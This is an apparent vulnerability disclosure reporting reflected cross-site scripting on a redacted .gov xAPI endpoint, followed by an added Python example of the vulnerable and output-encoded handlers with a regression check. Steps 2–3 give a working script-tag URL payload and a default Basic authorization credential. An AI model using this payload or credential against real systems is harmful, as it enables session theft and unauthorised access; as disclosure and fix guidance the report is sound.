Hi team,
I was able to execute XSS on ███████.gov
Steps to reproduce:
1- Turn on Burp's Intercept.
2- Go to https://██████.gov/xapi/statements?file"><script>alert(document.domain)</script>
3- In Intercept, add the following headers:
Authorization: Basic eGFwaS10b29sczp4YXBpLXRvb2xz
X-Experience-Api-Version: 1.0.1
4- When you send this GET request, the response reflects the payload and the script executes.
An attacker can send the malicious link to victims and steal their session cookies, leading to account takeover.
CVE-2021-41878
I have attached the video PoC; please check it out.
Suggested fix: sanitize and output-encode the inputs taken from the URL before they are reflected in the response.
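The following is an added example, not the reporter's code and not the affected site's code. It models the bug class behind step 4 and the suggested fix: a handler that rejects an unexpected query parameter and echoes its name into an HTML error body. Whether the real `/xapi/statements` handler works this way is an assumption; the report does not include server code. The allowed-parameter set, the `REDACTED.gov` host and the response bodies are constructed for the example.

```python
import html
from urllib.parse import parse_qs, urlsplit

# Constructed sample: the URL from step 2 with the host replaced by a
# placeholder. There is no '=' after `file`, so a query-string parser sees a
# parameter *name* of `file"><script>...</script>` with an empty value.
REPORTED_URL = ('https://REDACTED.gov/xapi/statements'
                '?file"><script>alert(document.domain)</script>')

# Hypothetical whitelist for the endpoint; the real list is not on the report.
ALLOWED_PARAMS = {"statementId", "voidedStatementId", "agent", "verb", "activity",
                  "since", "until", "limit", "format", "attachments"}


def unknown_params(url: str) -> list:
    """Return query parameter names the endpoint does not accept (attacker-controlled text)."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return [name for name in params if name not in ALLOWED_PARAMS]


def error_response_vulnerable(url: str) -> tuple:
    """The bug class: the raw parameter name is interpolated into HTML verbatim."""
    bad = ", ".join(unknown_params(url))
    body = "<html><body><p>Unexpected parameter: %s</p></body></html>" % bad
    return 400, {"Content-Type": "text/html; charset=utf-8"}, body


def error_response_fixed(url: str) -> tuple:
    """Hardened: HTML-encode anything reflected (quotes included, since the payload
    breaks out of an attribute with `"`), and tell browsers not to sniff the type."""
    bad = ", ".join(html.escape(name, quote=True) for name in unknown_params(url))
    body = "<html><body><p>Unexpected parameter: %s</p></body></html>" % bad
    headers = {"Content-Type": "text/html; charset=utf-8",
               "X-Content-Type-Options": "nosniff"}
    return 400, headers, body


def reflects_script(body: str) -> bool:
    """Regression check for the report's finding: an unencoded <script> tag in the body."""
    return "<script" in body.lower()


if __name__ == "__main__":
    for handler in (error_response_vulnerable, error_response_fixed):
        status, headers, body = handler(REPORTED_URL)
        print(handler.__name__, status, "reflects script:", reflects_script(body))
        print("  ", body)
```

The `reflects_script` check is the kind of assertion worth keeping in the endpoint's test suite once the fix lands, run against the exact URL from the report. Encoding at output time is the minimum; since xAPI responses are JSON, returning the error as `application/json` with `nosniff` rather than as HTML removes the rendering context entirely.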